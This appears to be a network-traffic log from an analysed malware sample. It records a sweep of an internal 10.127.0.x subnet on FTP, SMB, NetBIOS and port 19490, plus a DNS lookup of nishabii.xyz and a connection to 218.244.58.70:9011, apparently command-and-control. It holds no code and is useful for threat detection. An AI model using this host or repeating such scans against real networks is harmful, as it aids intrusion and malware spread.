N/A 10.127.0.126:21 tcp
N/A 10.127.0.127:21 tcp
N/A 10.127.0.128:21 tcp
N/A 10.127.0.129:21 tcp
N/A 10.127.0.130:21 tcp
N/A 10.127.0.131:21 tcp
N/A 10.127.0.132:21 tcp
N/A 10.127.0.134:21 tcp
N/A 10.127.0.133:21 tcp
N/A 10.127.0.137:21 tcp
N/A 10.127.0.135:21 tcp
N/A 10.127.0.136:21 tcp
N/A 10.127.0.138:21 tcp
N/A 10.127.0.139:21 tcp
N/A 10.127.0.140:21 tcp
N/A 10.127.0.141:21 tcp
N/A 10.127.0.142:21 tcp
N/A 10.127.0.143:21 tcp
N/A 10.127.0.144:21 tcp
N/A 10.127.0.145:21 tcp
N/A 10.127.0.146:21 tcp
N/A 10.127.0.147:21 tcp
N/A 10.127.0.148:21 tcp
N/A 10.127.0.150:21 tcp
N/A 10.127.0.149:21 tcp
N/A 10.127.0.151:21 tcp
N/A 10.127.0.153:21 tcp
N/A 10.127.0.152:21 tcp
N/A 10.127.0.154:21 tcp
N/A 10.127.0.155:21 tcp
N/A 10.127.0.158:21 tcp
N/A 10.127.0.157:21 tcp
N/A 10.127.0.156:21 tcp
N/A 10.127.0.159:21 tcp
N/A 10.127.0.160:21 tcp
N/A 10.127.0.161:21 tcp
N/A 10.127.0.162:21 tcp
N/A 10.127.0.164:21 tcp
N/A 10.127.0.163:21 tcp
N/A 10.127.0.165:21 tcp
N/A 10.127.0.166:21 tcp
N/A 10.127.0.167:21 tcp
N/A 10.127.0.169:21 tcp
N/A 10.127.0.168:21 tcp
N/A 10.127.0.170:21 tcp
N/A 10.127.0.171:21 tcp
N/A 10.127.0.172:21 tcp
N/A 10.127.0.173:21 tcp
N/A 10.127.0.175:21 tcp
N/A 10.127.0.174:21 tcp
N/A 10.127.0.177:21 tcp
N/A 10.127.0.176:21 tcp
N/A 10.127.0.178:21 tcp
N/A 10.127.0.179:21 tcp
N/A 10.127.0.180:21 tcp
N/A 10.127.0.181:21 tcp
N/A 10.127.0.182:21 tcp
N/A 10.127.0.183:21 tcp
N/A 10.127.0.185:21 tcp
N/A 10.127.0.184:21 tcp
N/A 10.127.0.186:21 tcp
N/A 10.127.0.187:21 tcp
N/A 10.127.0.188:21 tcp
N/A 10.127.0.190:21 tcp
N/A 10.127.0.189:21 tcp
N/A 10.127.0.0:19490 tcp
N/A 10.127.0.191:21 tcp
N/A 10.127.0.192:21 tcp
N/A 10.127.0.1:19490 tcp
N/A 10.127.0.193:21 tcp
N/A 10.127.0.194:21 tcp
N/A 10.127.0.2:19490 tcp
N/A 10.127.0.3:19490 tcp
N/A 10.127.0.195:21 tcp
N/A 10.127.0.5:19490 tcp
N/A 10.127.0.4:19490 tcp
N/A 10.127.0.196:21 tcp
N/A 10.127.0.197:21 tcp
N/A 10.127.0.7:19490 tcp
N/A 10.127.0.6:19490 tcp
N/A 10.127.0.8:19490 tcp
N/A 10.127.0.198:21 tcp
N/A 10.127.0.199:21 tcp
N/A 10.127.0.201:21 tcp
N/A 10.127.0.200:21 tcp
N/A 10.127.0.9:19490 tcp
N/A 10.127.0.10:19490 tcp
N/A 10.127.0.202:21 tcp
N/A 10.127.0.203:21 tcp
N/A 10.127.0.11:19490 tcp
N/A 10.127.0.204:21 tcp
N/A 10.127.0.13:19490 tcp
N/A 10.127.0.12:19490 tcp
N/A 10.127.0.16:19490 tcp
N/A 10.127.0.15:19490 tcp
N/A 10.127.0.14:19490 tcp
N/A 10.127.0.206:21 tcp
N/A 10.127.0.205:21 tcp
N/A 10.127.0.18:19490 tcp
N/A 10.127.0.17:19490 tcp
N/A 10.127.0.207:21 tcp
N/A 10.127.0.209:21 tcp
N/A 10.127.0.19:19490 tcp
N/A 10.127.0.208:21 tcp
N/A 10.127.0.210:21 tcp
N/A 10.127.0.25:19490 tcp
N/A 10.127.0.27:19490 tcp
N/A 10.127.0.26:19490 tcp
N/A 10.127.0.24:19490 tcp
N/A 10.127.0.22:19490 tcp
N/A 10.127.0.23:19490 tcp
N/A 10.127.0.21:19490 tcp
N/A 10.127.0.212:21 tcp
N/A 10.127.0.20:19490 tcp
N/A 10.127.0.211:21 tcp
N/A 10.127.0.220:21 tcp
N/A 10.127.0.219:21 tcp
N/A 10.127.0.218:21 tcp
N/A 10.127.0.217:21 tcp
N/A 10.127.0.216:21 tcp
N/A 10.127.0.215:21 tcp
N/A 10.127.0.214:21 tcp
N/A 10.127.0.213:21 tcp
N/A 10.127.0.28:19490 tcp
N/A 10.127.0.30:19490 tcp
N/A 10.127.0.29:19490 tcp
N/A 10.127.0.222:21 tcp
N/A 10.127.0.31:19490 tcp
N/A 10.127.0.221:21 tcp
N/A 10.127.0.223:21 tcp
N/A 10.127.0.32:19490 tcp
N/A 10.127.0.224:21 tcp
N/A 10.127.0.33:19490 tcp
N/A 10.127.0.34:19490 tcp
N/A 10.127.0.225:21 tcp
N/A 10.127.0.36:19490 tcp
N/A 10.127.0.38:19490 tcp
N/A 10.127.0.37:19490 tcp
N/A 10.127.0.35:19490 tcp
N/A 10.127.0.39:19490 tcp
N/A 10.127.0.227:21 tcp
N/A 10.127.0.226:21 tcp
N/A 10.127.0.228:21 tcp
N/A 10.127.0.229:21 tcp
N/A 10.127.0.230:21 tcp
N/A 10.127.0.40:19490 tcp
N/A 10.127.0.231:21 tcp
N/A 10.127.0.232:21 tcp
N/A 10.127.0.233:21 tcp
N/A 10.127.0.42:19490 tcp
N/A 10.127.0.41:19490 tcp
N/A 10.127.0.234:21 tcp
N/A 10.127.0.235:21 tcp
N/A 10.127.0.43:19490 tcp
N/A 10.127.0.44:19490 tcp
N/A 10.127.0.53:19490 tcp
N/A 10.127.0.45:19490 tcp
N/A 10.127.0.54:19490 tcp
N/A 10.127.0.47:19490 tcp
N/A 10.127.0.46:19490 tcp
N/A 10.127.0.48:19490 tcp
N/A 10.127.0.50:19490 tcp
N/A 10.127.0.51:19490 tcp
N/A 10.127.0.49:19490 tcp
N/A 10.127.0.236:21 tcp
N/A 10.127.0.52:19490 tcp
N/A 10.127.0.244:21 tcp
N/A 10.127.0.241:21 tcp
N/A 10.127.0.56:19490 tcp
N/A 10.127.0.55:19490 tcp
N/A 10.127.0.57:19490 tcp
N/A 10.127.0.238:21 tcp
N/A 10.127.0.237:21 tcp
N/A 10.127.0.242:21 tcp
N/A 10.127.0.239:21 tcp
N/A 10.127.0.243:21 tcp
N/A 10.127.0.245:21 tcp
N/A 10.127.0.246:21 tcp
N/A 10.127.0.240:21 tcp
N/A 10.127.0.247:21 tcp
N/A 10.127.0.248:21 tcp
N/A 10.127.0.249:21 tcp
N/A 10.127.0.64:19490 tcp
N/A 10.127.0.63:19490 tcp
N/A 10.127.0.62:19490 tcp
N/A 10.127.0.61:19490 tcp
N/A 10.127.0.60:19490 tcp
N/A 10.127.0.59:19490 tcp
N/A 10.127.0.58:19490 tcp
N/A 10.127.0.250:21 tcp
N/A 10.127.0.251:21 tcp
N/A 10.127.0.253:21 tcp
N/A 10.127.0.65:19490 tcp
N/A 10.127.0.254:21 tcp
N/A 10.127.0.252:21 tcp
N/A 10.127.0.67:19490 tcp
N/A 10.127.0.68:19490 tcp
N/A 10.127.0.66:19490 tcp
N/A 10.127.0.69:19490 tcp
N/A 10.127.0.72:19490 tcp
N/A 10.127.0.70:19490 tcp
N/A 10.127.0.71:19490 tcp
N/A 10.127.0.73:19490 tcp
N/A 10.127.0.74:19490 tcp
N/A 10.127.0.76:19490 tcp
N/A 10.127.0.75:19490 tcp
N/A 10.127.0.77:19490 tcp
N/A 10.127.0.78:19490 tcp
N/A 10.127.0.79:19490 tcp
N/A 10.127.0.81:19490 tcp
N/A 10.127.0.80:19490 tcp
N/A 10.127.0.82:19490 tcp
N/A 10.127.0.84:19490 tcp
N/A 10.127.0.83:19490 tcp
N/A 10.127.0.85:19490 tcp
N/A 10.127.0.86:19490 tcp
N/A 10.127.0.87:19490 tcp
N/A 10.127.0.88:19490 tcp
N/A 10.127.0.90:19490 tcp
N/A 10.127.0.91:19490 tcp
N/A 10.127.0.92:19490 tcp
N/A 10.127.0.93:19490 tcp
N/A 10.127.0.94:19490 tcp
N/A 10.127.0.97:19490 tcp
N/A 10.127.0.96:19490 tcp
N/A 10.127.0.95:19490 tcp
N/A 10.127.0.98:19490 tcp
N/A 10.127.0.101:19490 tcp
N/A 10.127.0.102:19490 tcp
N/A 10.127.0.99:19490 tcp
N/A 10.127.0.100:19490 tcp
N/A 10.127.0.103:19490 tcp
N/A 10.127.0.104:19490 tcp
N/A 10.127.0.105:19490 tcp
N/A 10.127.0.106:19490 tcp
N/A 10.127.0.108:19490 tcp
N/A 10.127.0.107:19490 tcp
N/A 10.127.0.109:19490 tcp
N/A 10.127.0.110:19490 tcp
N/A 10.127.0.111:19490 tcp
N/A 10.127.0.112:19490 tcp
N/A 10.127.0.113:19490 tcp
N/A 10.127.0.114:19490 tcp
N/A 10.127.0.115:19490 tcp
N/A 10.127.0.116:19490 tcp
N/A 10.127.0.117:19490 tcp
US 8.8.8.8:53 nishabii.xyz udp
N/A 10.127.0.118:19490 tcp
N/A 10.127.0.119:19490 tcp
N/A 10.127.0.120:19490 tcp
N/A 10.127.0.121:19490 tcp
CN 218.244.58.70:9011 nishabii.xyz tcp
N/A 10.127.0.122:19490 tcp
N/A 10.127.0.123:19490 tcp
N/A 10.127.0.125:19490 tcp
N/A 10.127.0.124:19490 tcp
N/A 10.127.0.127:19490 tcp
N/A 10.127.0.126:19490 tcp
N/A 10.127.0.128:19490 tcp
N/A 10.127.0.130:19490 tcp
N/A 10.127.0.129:19490 tcp
N/A 10.127.0.131:19490 tcp
N/A 10.127.0.132:19490 tcp
N/A 10.127.0.134:19490 tcp
N/A 10.127.0.133:19490 tcp
N/A 10.127.0.136:19490 tcp
N/A 10.127.0.135:19490 tcp
N/A 10.127.0.137:19490 tcp
N/A 10.127.0.138:19490 tcp
N/A 10.127.0.139:19490 tcp
N/A 10.127.0.142:19490 tcp
N/A 10.127.0.140:19490 tcp
N/A 10.127.0.141:19490 tcp
N/A 10.127.0.143:19490 tcp
N/A 10.127.0.145:19490 tcp
N/A 10.127.0.146:19490 tcp
N/A 10.127.0.147:19490 tcp
N/A 10.127.0.144:19490 tcp
N/A 10.127.0.148:19490 tcp
N/A 10.127.0.150:19490 tcp
N/A 10.127.0.149:19490 tcp
N/A 10.127.0.151:19490 tcp
N/A 10.127.0.154:19490 tcp
N/A 10.127.0.153:19490 tcp
N/A 10.127.0.152:19490 tcp
N/A 10.127.0.155:19490 tcp
N/A 10.127.0.157:19490 tcp
N/A 10.127.0.156:19490 tcp
N/A 10.127.0.158:19490 tcp
N/A 10.127.0.160:19490 tcp
N/A 10.127.0.159:19490 tcp
N/A 10.127.0.162:19490 tcp
N/A 10.127.0.161:19490 tcp
N/A 10.127.0.163:19490 tcp
N/A 10.127.0.164:19490 tcp
N/A 10.127.0.166:19490 tcp
N/A 10.127.0.165:19490 tcp
N/A 10.127.0.167:19490 tcp
N/A 10.127.0.169:19490 tcp
N/A 10.127.0.168:19490 tcp
N/A 10.127.0.170:19490 tcp
N/A 10.127.0.171:19490 tcp
N/A 10.127.0.172:19490 tcp
N/A 10.127.0.173:19490 tcp
N/A 10.127.0.175:19490 tcp
N/A 10.127.0.174:19490 tcp
N/A 10.127.0.177:19490 tcp
N/A 10.127.0.176:19490 tcp
N/A 10.127.0.179:19490 tcp
N/A 10.127.0.178:19490 tcp
N/A 10.127.0.181:19490 tcp
N/A 10.127.0.180:19490 tcp
N/A 10.127.0.182:19490 tcp
N/A 10.127.0.183:19490 tcp
N/A 10.127.0.185:19490 tcp
N/A 10.127.0.184:19490 tcp
N/A 10.127.0.186:19490 tcp
N/A 10.127.0.187:19490 tcp
N/A 10.127.0.190:19490 tcp
N/A 10.127.0.188:19490 tcp
N/A 10.127.0.189:19490 tcp
N/A 10.127.0.191:19490 tcp
N/A 10.127.0.192:19490 tcp
N/A 10.127.0.194:19490 tcp
N/A 10.127.0.193:19490 tcp
N/A 10.127.0.197:19490 tcp
N/A 10.127.0.196:19490 tcp
N/A 10.127.0.195:19490 tcp
N/A 10.127.0.199:19490 tcp
N/A 10.127.0.198:19490 tcp
N/A 10.127.0.201:19490 tcp
N/A 10.127.0.200:19490 tcp
N/A 10.127.0.202:19490 tcp
N/A 10.127.0.203:19490 tcp
N/A 10.127.0.204:19490 tcp
N/A 10.127.0.206:19490 tcp
N/A 10.127.0.205:19490 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.207:19490 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.209:19490 tcp
N/A 10.127.0.208:19490 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.210:19490 tcp
N/A 10.127.0.211:19490 tcp
N/A 10.127.0.212:19490 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.220:19490 tcp
N/A 10.127.0.213:19490 tcp
N/A 10.127.0.214:19490 tcp
N/A 10.127.0.215:19490 tcp
N/A 10.127.0.217:19490 tcp
N/A 10.127.0.216:19490 tcp
N/A 10.127.0.219:19490 tcp
N/A 10.127.0.218:19490 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.221:19490 tcp
N/A 10.127.0.222:19490 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.223:19490 tcp
N/A 10.127.0.224:19490 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.225:19490 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.226:19490 tcp
N/A 10.127.0.227:19490 tcp
N/A 10.127.0.230:19490 tcp
N/A 10.127.0.228:19490 tcp
N/A 10.127.0.229:19490 tcp
N/A 10.127.0.231:19490 tcp
N/A 10.127.0.232:19490 tcp
N/A 10.127.0.233:19490 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.234:19490 tcp
N/A 10.127.0.235:19490 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.236:19490 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.249:19490 tcp
N/A 10.127.0.248:19490 tcp
N/A 10.127.0.240:19490 tcp
N/A 10.127.0.246:19490 tcp
N/A 10.127.0.247:19490 tcp
N/A 10.127.0.243:19490 tcp
N/A 10.127.0.245:19490 tcp
N/A 10.127.0.239:19490 tcp
N/A 10.127.0.242:19490 tcp
N/A 10.127.0.237:19490 tcp
N/A 10.127.0.241:19490 tcp
N/A 10.127.0.238:19490 tcp
N/A 10.127.0.244:19490 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.250:19490 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.254:19490 tcp
N/A 10.127.0.252:19490 tcp
N/A 10.127.0.251:19490 tcp
N/A 10.127.0.253:19490 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.37:139 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.47:139 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.67:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.72:139 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.75:139 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.88:139 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.92:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.108:139 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.194:445 tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.128:139 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.180:139 tcp
N/A 10.127.0.181:139 tcp
N/A 10.127.0.182:139 tcp
